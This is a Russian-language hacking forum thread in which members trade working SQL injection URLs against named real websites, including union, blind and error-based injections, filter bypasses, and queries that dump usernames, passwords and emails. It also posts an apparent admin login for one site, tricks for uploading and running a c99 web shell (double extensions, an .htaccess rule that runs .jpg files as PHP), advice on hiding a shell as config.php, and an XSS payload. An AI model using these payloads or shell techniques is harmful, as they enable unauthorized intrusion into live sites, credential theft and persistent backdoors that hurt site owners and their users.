я конечно этому не верю что file_priv инклудит, но если даже это было бы так, то в нашем случай инклуд=читалка, так как в файле нету кода.

но как мы знаем я всегда не прав,так что простите за дезинформацию.

ну а если серьезно то лучше бы ты этого не сказал.

"]
[Feldmarschall] said:
file_priv не для чтения файлов а для инклюдинга.



[Feldmarschall], чо?

"]
[Feldmarschall] said:
file_priv не для чтения файлов а для инклюдинга.


File_priv распространяется только на чтение файлов и на их запись, ни о каком инклудинге речи идти не может.

ребята, а где вы тут file_priv видите?

file_priv - доступ к файлам на сервере!

вперед читать мануалы, ыыы

цитирую:


File-пользователь,обладающий этим правом,может выполнять команды LOAD DATA INFILE и SELECT...INTO OUTFILE и может читать и записывать любой файл на сервере MySQL.


Konqi:

Я думаю ты меня не понял, этот вариант возможен, но не рационален... ты же штаны через голову не одеваешь?

Извини за грубое сравнение ) ты наверное один стараешься здесь все поддержать )

http://www.fcdinamokirov.ru/2010/news10.php?seldate_down=20110101+union+select+1,2, 3,FILE_PRIV,5,6,7+from+mysql.user+--+

где вы здесь увидели file_priv Y? В упор не вижу....

547 said:
http://www.fcdinamokirov.ru/2010/news10.php?seldate_down=20110101+union+select+1,2, 3,FILE_PRIV,5,6,7+--+
где вы здесь увидели file_priv Y? В упор не вижу....


да нет там нихрена...хз что развели демагогию...никаких прав у юзверя в данном случае нет..и говорить о том как можно было бы сделать , если бы были эти права..я считаю нонсенсом....

почему не показать номер?

http://www.ofisdubai.com/brandproductlist.php?brandid=-9999 and 1=0 UNION SELECT 1,2,3,4+--+

http://www.ofisdubai.com/brandproductlist.php?brandid=-9999 and 1=0 UNION SELECT 1,2,3,4+--+

happygirl said:
почему не показать номер?
http://www.ofisdubai.com/brandproductlist.php?brandid=-9999 and 1=0 UNION SELECT 1,2,3,4+--+
http://www.ofisdubai.com/brandproductlist.php?brandid=-9999 and 1=0 UNION SELECT 1,2,3,4+--+


http://www.ofisdubai.com/newsletterContent.php?id=-8+union+select+1,2,3,4,5

547 said:
http://www.fcdinamokirov.ru/2010/news10.php?seldate_down=20110101+union+select+1,2, 3,FILE_PRIV,5,6,7+--+
где вы здесь увидели file_priv Y? В упор не вижу....


Таким запросом ты его никогда в жизни и не увидишь.

happygirl said:
почему не показать номер?
http://www.ofisdubai.com/brandproductlist.php?brandid=-9999 and 1=0 UNION SELECT 1,2,3,4+--+
http://www.ofisdubai.com/brandproductlist.php?brandid=-9999 and 1=0 UNION SELECT 1,2,3,4+--+


потому что чуркой быть, это судьба... вы хоть читать умеете? или с пастбища научились в интернет выходить, ковычку подставили и все..ХАЦКЕР мега кул....модеры потрите мой пост если я не прав...предлагаю ввести правило что бы таких юзверей по повторному вопросу по стандартной скуле отсылать как минимум на день в бан... и ссылку на мануал по скулям датЬ...будет и время и источник ..

547 said:
http://www.fcdinamokirov.ru/2010/news10.php?seldate_down=20110101+union+select+1,2, 3,FILE_PRIV,5,6,7+--+
где вы здесь увидели file_priv Y? В упор не вижу....


Чтение файлов нету, максимум что можно от сюда достать так это юзеров (159)

http://www.fcdinamokirov.ru/2010/news10.php?seldate_down=20110101+union+select+1,2, 3,concat_ws(char(58),nick,password,email),5,6,7+fr om+users--

.:GOGA:. said:
Чтение файлов нету, максимум что можно от сюда достать так это юзеров (159)
http://www.fcdinamokirov.ru/2010/news10.php?seldate_down=20110101+union+select+1,2, 3,concat_ws(char(58),nick,password,email),5,6,7+fr om+users--


.:GOGA:. самый хацкер что ли?

клац (https://antichat.live/showpost.php/p/2254217/postcount/14385/)

после того как клацнешь, посмотри на номер твоего поста

Что можно сделать с такими правами?)

http://s43.radikal.ru/i101/1007/50/41faddaf4b6e.jpg (http://www.radikal.ru)

случайно на одном забугорхостинге нашел - протыкал на своем шелле кнопочку вверх и попал в этот католог все файло и дампы просматривать можно

InfectedM said:
Что можно сделать с такими правами?)
http://s43.radikal.ru/i101/1007/50/41faddaf4b6e.jpg (http://www.radikal.ru)
случайно на одном забугорхостинге нашел - протыкал на своем шелле кнопочку вверх и попал в этот католог все файло и дампы просматривать можно


и какой ответ ты хочешь услышать? в чем именно твой вопрос конкретно? если сейчас обьяснять тебе что можно делать на серванте с такими правами..я боюсь что на статью потянет..и еще откликнутся еще много добрых молодцев страстно желающие тебе помочь и будут вставлять свои 5 копеек по поводу использования шелла с "такими правам"...

http://www.site.com/index.php?_a=viewCat&catId=145'

сайт является уязвимым

Я не могу подсчитать число столбцов

уязвимых ошибке

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/vhosts/site.com/httpdocs/includes/content/viewCat.inc.php on line 41

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''a' at line 1

linuxkernal said:
http://www.site.com/index.php?_a=viewCat&catId=145'
сайт является уязвимым
Я не могу подсчитать число столбцов
уязвимых ошибке
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/vhosts/site.com/httpdocs/includes/content/viewCat.inc.php on line 41
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''a' at line 1


все экстрасенсы на отдыхе сейчас, вернись через пару месяцев..а лучше никогда

вот тебе ответ

http://www.site.com/index.php?_a=viewCat&catId=145'+правильный синтаксис запроса SQL

не знаю если поймешь так как ты не русско-язычный..а гугл не сможет перевести, но все твои вопросы попадают под категорию "Пойди туда ,не знаю куда, принеси то, не знаю что"

Gorev said:
и какой ответ ты хочешь услышать? в чем именно твой вопрос конкретно? если сейчас обьяснять тебе что можно делать на серванте с такими правами..я боюсь что на статью потянет..и еще откликнутся еще много добрых молодцев страстно желающие тебе помочь и будут вставлять свои 5 копеек по поводу использования шелла с "такими правам"...


Хотелось бы узнать где обычно лежат пароли от Cpanel mysql фтп

Хотя ,наверно,без знаний линух смысла нет мне туда суватся, пускай пока живет

InfectedM said:
Хотелось бы узнать где обычно лежат пароли от Cpanel mysql фтп
Хотя ,наверно,без знаний линух смысла нет мне туда суватся, пускай пока живет


config..

Прочитал статейку про обход фильтрации, но ни один приведённый способ не помог.Не смог применить на практике, но часто встречаюсь. Поэтому материал не усвоил =)

Хотелось бы на живом примере. Вот нашел сайт, вроде подходящий.

http://aktualnews.com/sport/?id=764'

select%20 или (+) c пробелом фильтруется (Forbidden), с /**/ запрос проходит.

Версия 5.0.90-community

http://aktualnews.com/sport/?id=-764/**/union/**/select/**/1,2,version(),4,5--+

Имена таблиц из information_schema.tables получить не могу, т.к. from фильтруется тоже. Вот как его обойти и хотелось бы увидеть на примере.

возможно просто нет доступа к information_schema.tables, но я с таким ещё не встречался.Поэтому мне кажется дело в фильтрации,но я могу и ошибаться.

auth_root

http://aktualnews.com/sport/?id=-764/**/union/**/select/**/1,2,column_name,4,5/**/FrOm/**/information_schema.columns--+

там фильтр на information_schema.tables

Konqi

Спасибо... А ларчик просто открывался =)

опять не повезло.

Ладно, поищу что нибудь подходящее =)

Exploit for OpenSSH 3.8

Ребят, под эту версию есть какие нибудь эксплоиты? весь гугл перерыл - ничего дельного не нашел =(

auth_root said:
Прочитал статейку про обход фильтрации, но ни один приведённый способ не помог.Не смог применить на практике, но часто встречаюсь. Поэтому материал не усвоил =)
Хотелось бы на живом примере. Вот нашел сайт, вроде подходящий.
http://aktualnews.com/sport/?id=764'
select%20 или (+) c пробелом фильтруется (Forbidden), с /**/ запрос проходит.
Версия 5.0.90-community
http://aktualnews.com/sport/?id=-764/**/union/**/select/**/1,2,version(),4,5--+
Имена таблиц из information_schema.tables получить не могу, т.к. from фильтруется тоже. Вот как его обойти и хотелось бы увидеть на примере.
возможно просто нет доступа к information_schema.tables, но я с таким ещё не встречался.Поэтому мне кажется дело в фильтрации,но я могу и ошибаться.


_http://aktualnews.com/sport/?id=-764/**/union/**/select/**/1,2,3,4,5/**/FrOm/**/information_schema.`tables`--+

Как можно попасть в админку, если есть запрос при авторизации

SELECT pass FROM user WHERE username = '[SQL]'

Этиим запросом достается пароль и сверяется с тем паролем, что я ввел, поэтому "or 1=1--" и прочее не подходит.

Не удается подобрать поля


http://www.arbeitsmarktportal.eu/stellengesuche4.php?Bundesland=Baden-W%FCrttemberg&AktuelleSeite=%2527


Помогите плиз справится

AKYLA said:
Не удается подобрать поля
Помогите плиз справится


http://www.arbeitsmarktportal.eu/stellengesuche-anzeigen.php?recordID=1816+UNION+SELECT+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31,32,33,34,35,36,unhex(hex(v ersion()),38,39,40,41,42,43,44,45+LIMIT+1,1--

Database Version: 4.1.13

AKYLA said:
Не удается подобрать поля
Помогите плиз справится


если не получается в одном скрипте реализовать sql, то ищи другие скрипты и пробуй реализовать там, как впринцепи и зделал Gorev

попугай said:
Как можно попасть в админку, если есть запрос при авторизации
SELECT pass FROM user WHERE username = '
[SQL]
'
Этиим запросом достается пароль и сверяется с тем паролем, что я ввел, поэтому "or 1=1--" и прочее не подходит.


а поконкретней код как устроен?

переименовал шелл c99.php на c99.php.jpg

попробовал уже на 2х админках, не заливается выдает ошибку что не тот формат можт че не так или админ сильно умный

KENT1994 said:
переименовал шелл c99.php на c99.php.jpg
попробовал уже на 2х админках, не заливается выдает ошибку что не тот формат
можт че не так или админ сильно умный


конечно же все зависит от скрипта через который происходит заливка, не все же скрипты проверяют расширение...у некоторых есть и другие способы защиты от заливки нежелательных файлов

тыц мышкой (http://habrahabr.ru/blogs/php/44610/)

еще вопрос , залил все таки шелл c99.php.jpg , но страница не отображается

пишет 403

http://www.site.org/docs/c99madshell.php.jpg

KENT1994 said:
еще вопрос , залил все таки шелл c99.php.jpg , но страница не отображается
пишет 403


тебе милок уже нужно ЛФИ для этого..

KENT1994 said:
еще вопрос , залил все таки шелл c99.php.jpg , но страница не отображается
пишет 403


попробуй залить c99.php3, php5, phtml

Konqi said:
попробуй залить c99.php3, php5, phtml


Forbidden

You don't have permission to access /docs/c99madshell.php3 on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

Apache/1.3.41 Server at www.site.org Port 80

чувствую не судьба

KENT1994 said:
Forbidden
You don't have permission to access /docs/c99madshell.php3 on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Apache/1.3.41 Server at www.site.org Port 80
чувствую не судьба


.htaccess если настроен хорошо то не проканает другое расширение.. поищи инклюд на сайте, тогда может и будет шанc

еще 1 вопрос , залил c99.php.jpg но при просмотре выдается только картинка с адресом шелла, а самого его нет , хотя на сервере висит

KENT1994 said:
еще 1 вопрос , залил c99.php.jpg но при просмотре выдается только картинка с адресом шелла, а самого его нет , хотя на сервере висит



Потому что .jpg это расширение картинок, а не php-скриптов.

попугай said:
Потому что .jpg это расширение картинок, а не php-скриптов.

KENT1994

А исполнятца он у тебя как будет? о_О

shell.jpg.php shell.pdf.php и.т.д.

Пробуй подмену запроса

или залить в ту же папку .htaccess



RemoveHandler .jpg
AddType application/x-httpd-php .jpg



следом shell.jpg

PS: Самое главное, пробуй почитать!!1

Gorev

Спасибо я просто не думал что там столько полей ))

AKYLA said:
Gorev
Спасибо
я просто не думал что там столько полей ))


а зачем думать? для этого есть group by и order by ..ну или union+select на худой конец

подскажите, есть аналог sql helper, только с заливкой файла? (кроме sipt)

PROK said:
подскажите, есть аналог sql helper, только с заливкой файла? (кроме sipt)


а вручную сделать запрос? программа она на то и есть программа что все не умеет, самые гибкие подходы к иньекциям это только ручной запрос...а если дамп нужен то и сипт подойдет

Помогите со скулей (https://www.vebeg.de/web/en/verkauf/suchen.htm?DO_SUCHE=1&SUCH_NACHKFZ=1&SUCH_FZART=A&SUCH_KFZMARKE=0&SUCH_KFZKAT=&SUCH_FREITEXT=&SUCH_PLZ=&SUCH_PLZUMKREIS=0&SUCH_ORDER=A&SUCH_AUS_ID=&SUCH_LOS_ID=&statflag=1&SUCH_STARTREC=120). При подстановке кавычки выдает практически стандартную ошибку, но в конце дописывает '\',20' at line 6. В общем, дальше вообще продвинуться не могу.

Gorev said:
а вручную сделать запрос? программа она на то и есть программа что все не умеет, самые гибкие подходы к иньекциям это только ручной запрос...а если дамп нужен то и сипт подойдет


ленивый я , да и профиль не мой, поэтому интересна максимальная автоматизация. в идеале - скормить список урлов, на выходе файлы с успешными, неуспешными, полууспешными (такую, естественно, заказывать надо, но мало-ли).

копаю 1сайт .ge

так там site.ge/?param=1 когда приписываю '' 0 эффекта, значт прикрыто

когда к site.ge/?param=1 приписываю 1=1-- то выдает такую траблу...


Security Patch Activated!


как обойти? или не стоит даже капать т.к там админы не лохи

KENT1994 said:
копаю 1сайт .ge
так там site.ge/?param=1 когда приписываю '' 0 эффекта, значт прикрыто
когда к site.ge/?param=1 приписываю 1=1-- то выдает такую траблу...
как обойти? или не стоит даже капать т.к там админы не лохи


кАпай дальше... вопрос из категории "угадай что там за скрипт и как он работает"..пару минут мне надо настроить свою кристальную сферу и надеть шаманский череп на голову..и я тебе дам ответ

привет прошу с советом для mssql inj

пример линка:

script.asp?ID=111'


PHP:
Microsoft OLE DB ProviderforODBC Drivers erro r'80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]

Incorrect syntax near ТУТ ОДИНАРНЫ� � КАВЫЧКА)

script.asp?ID=111+and+convert(int,(@@version))--


PHP:
Microsoft OLE DB ProviderforODBC Drivers erro r'80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near'andconvert'.

тут вырезается пробели всех вариантов

в чем может быть трабла? Как нит можно обходить?

YuNi|[c said:
тут вырезается пробели всех вариантов
в чем может быть трабла? Как нит можно обходить?


)and(convert(int,(@@version))--

/**/and/**/convert(int,(@@version))--

а так?

Народ как можно заюзать эту уязвимость?

MS04-003 Buffer Overrun in MDAC Function Could Allow Code Execution (832483)

переполнение буфера,в meta sploit усть эксплоит?и какой шелл заюзать.Заранее спасибо.

stan_q said:
Помогите со
скулей (https://www.vebeg.de/web/en/verkauf/suchen.htm?DO_SUCHE=1&SUCH_NACHKFZ=1&SUCH_FZART=A&SUCH_KFZMARKE=0&SUCH_KFZKAT=&SUCH_FREITEXT=&SUCH_PLZ=&SUCH_PLZUMKREIS=0&SUCH_ORDER=A&SUCH_AUS_ID=&SUCH_LOS_ID=&statflag=1&SUCH_STARTREC=120)
. При подстановке кавычки выдает практически стандартную ошибку, но в конце дописывает '\',20' at line 6. В общем, дальше вообще продвинуться не могу.


Видимо иньекция в лимите, не обрежеш запрос. Или подзапросами юзай, more 1 row попробуй, или ищи другией скрипты на предмет уязвимости. Я часто с таким встречался, обойти не вышло.

"]
[Feldmarschall] said:
)and(convert(int,(@@version))--
/**/and/**/convert(int,(@@version))--
а так?


нет этого тоже пробовал ответ один и тоже ((

http://www.sysadmin.mail.ru/rekords_detail.php?id=2' выплюнуло ошибку, но раскрутить не выходит

Bramin said:
http://www.sysadmin.mail.ru/rekords_detail.php?id=2' выплюнуло ошибку, но раскрутить не выходит


http://www.sysadmin.mail.ru/rekords_detail.php?id=2 та же самая ошибка и без ковычки,говорит о чем нить?

там сначало было так id=27 потом кавычку я подставил сюда id=2'7 -ошибка, если кавычку поставить после 7 ошибки нет

http://www.tarpanmoscow.ru/index.php?id=36742 - помогите скулю раскрутить, вроде 9 полей нашел но не выводится ни фига..

Bramin said:
там сначало было так id=27 потом кавычку я подставил сюда id=2'7 -ошибка, если кавычку поставить после 7 ошибки нет



Там интвал, скорей всего, скули нет.

Когда кавычку добавляешь к 27, то интвалится до 27, а когда подставляешь ее между 2 и 7, то интвалится до 2, а в базе записи с id 2, видимо, нет, поэтому и ошибка.

blind

http://www.tarpanmoscow.ru/index.php?id=36742 AND Length((version()))=6

http://www.tarpanmoscow.ru/index.php?id=36742 AND ascii(substring((version()),6,1))=53

ver. 5.1.45

---------------------

http://www.tarpanmoscow.ru/admin/

admin : admin1tar

ZARO

Ну тут именно блайнд

database:db7364a

AKYLA said:
ZARO
Ну тут именно блайнд
database:db7364a


о спасиба, ты крут, а я не знал что там блайнд -.-

"]
[Feldmarschall] said:
скорей всего blind
http://www.tarpanmoscow.ru/index.php?id=36742 AND Length((version()))=6
http://www.tarpanmoscow.ru/index.php?id=36742 AND ascii(substring((version()),6,1))=53
ver.
5.1.45
---------------------
http://www.tarpanmoscow.ru/admin/
admin : admin1tar


разговор о другой скули друг... посмотри вышe, Попугай имел в виду ошибку на мейл.рy

Добрый день.

Вопрос по актывным XSS.

Нашел простую, пассивную:


http://otdih.nakubani.ru/forum/themes/?forumid=13">alert('')


Так же на этом перловском полуфоруме можно добавлять темы/сообщения от гостя;

Вот мои попытки расставить акт.xss:


http://otdih.nakubani.ru/forum/themes/view/?themeid=14547
http://otdih.nakubani.ru/forum/themes/view/?themeid=1188


Наверняка, я делаю что-то не правильно... Не подскажете, что именно?!

Как можно спрятать шелл

он висит на видном месте site.com/shell.php

Помогите раскрутить или советом =)

Для НЕэкстрасенсов

http://macklaw.com/in_the_news/press_detail.asp?id=-94'


Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'ID = -94'''. /in_the_news/press_detail.asp, line 15


Не получается даже вывести версию.

В MsAccess, MsSQL не силен.

Если не получится то хоть обьясните почему =)

Расчитываю на вашу помощь...

auth_root

http://macklaw.com/in_the_news/press_detail.asp?id=-94+union+select+1,2,3,4,5,6+from+msysaccessobjects

http://macklaw.com/in_the_news/press_detail.asp?id=-94+union+select+1,2,3,password,5,6+from+users

http://macklaw.com/in_the_news/press_detail.asp?id=-94+union+select+1,2,3,username,5,6+from+users

Помогите раскрутить скулю.

http://banken.ruilen.nl/random.php?catid=473+union+select+version()--+

а вот database() уже не показывает почему то.Пишет Unknown column 'admin_ruilen' in 'where clause' Вывод обрезанный, вроде четвертая версия.

Буду рад любым примерам, т.к. опыта маловато...

Вывод в ошибке.

Keltos said:
Как можно спрятать шелл
он висит на видном месте site.com/shell.php


спрячь поглубже и переименуй во что-нибудь типа config.php, если всё равно боишься, что удалят сделай удалённый инклуд в странице сайта.

Там двойной запрос.


http://banken.ruilen.nl/random.php?catid=473+union+select+concat(0x3a,user (),0x3a,database(),0x3a,version())--+


Обьяснять как работает - не буду, кто понял, тот понял

Konqi

Огромное спасибо!

Вопрос, перебирать поля необходимо только с реально существующей в базе таблицой?

Если да, то для удобства просто, таблица

msysaccessobjects

встречается во всех бд данного типа? Или прийдется наугад подбирать? Если можно, если существуют такие, подкиньте плз. таких таблиц, как в MySQL например information_schema в пятой ветке есть везде.

auth_root

/thread210003.html

Konqi

огромное тебе спасибо! =) Плюс.

Только вопрос, админку не нашел? =) Если нашел или шелл залил, не мог бы скинуть в пм? Хотелось бы конечно увидеть пошагово, какие ты проводишь манипуляции с запросами при взломе. Но это будет наглеж с моей стороны отбирать твое время. Поэтому я изучаю статейку, хотелось бы все повторить на практике, вплоть до заливки шелла.

Не тупо скопировать всё за кем то, а разобраться и понять каждый передаваемый параметр...

auth_root said:
Konqi
огромное тебе спасибо! =) Плюс.
Только вопрос, админку не нашел? =) Если нашел или шелл залил, не мог бы скинуть в пм? Хотелось бы конечно увидеть пошагово, какие ты проводишь манипуляции с запросами при взломе. Но это будет наглеж с моей стороны отбирать твое время. Поэтому я изучаю статейку, хотелось бы все повторить на практике, вплоть до заливки шелла.


админку даже не искал, это уже не мое дело )

проскан сайт (IntelliTamper,DirBuster, ArxScanSite...)

Konqi

А доступа к системным таблицам нету, как я понимаю, или я не прав?

Yetisports

http://banken.ruilen.nl/random.php?catid=473

Тут блайнд, 4-я ветка

database: admin_ruilen

auth_root said:
Konqi
А доступа к системным таблицам нету, как я понимаю, или я не прав?


смотря на какой, нет доступа к Msysobjects, но есть доступ к Msysaccessobjects

а остальные(не дефолтные) таблицы нужно брутить

AKYLA said:
Yetisports
http://banken.ruilen.nl/random.php?catid=473
Тут блайнд, 4-я ветка
database: admin_ruilen


Зачем крутить как blind, если можно добиться вывода?

AKYLA


Code:
http://banken.ruilen.nl/random.php?catid=473+group+by+concat(version(),ran d(0)|0)+having+avg(0)--+

ололо ) думаем ребята )

Ну вообще да, можно вывести и так


http://banken.ruilen.nl/random.php?catid=473+UnIoN+SeLeCt+concat_ws%280x3a ,version%28%29,%20user%28%29,database%28%29%29--

AKYLA said:
Ну вообще да, можно вывести и так


Эм... А разница? /showpost.php?p=2262240&postcount=14459

Ах да, я нашёл в чем разница.

Твой способ обрезает часть версии.

mailbrush said:
Эм... А разница? /showpost.php?p=2262240&postcount=14459
Ах да, я нашёл в чем разница.
Твой способ обрезает часть версии.


Что где обрезанно? О_О что то я вас не понимаю молодой человек Раскрути ее своим запросом, вот тебе и разница

PS:Хотя спорить бесполезно каждый кулик свое болото хвалит.

Объясните "что делает" эта запись rand(0)|0 ?? ну в смысле, для чего нужна вертикальная черта?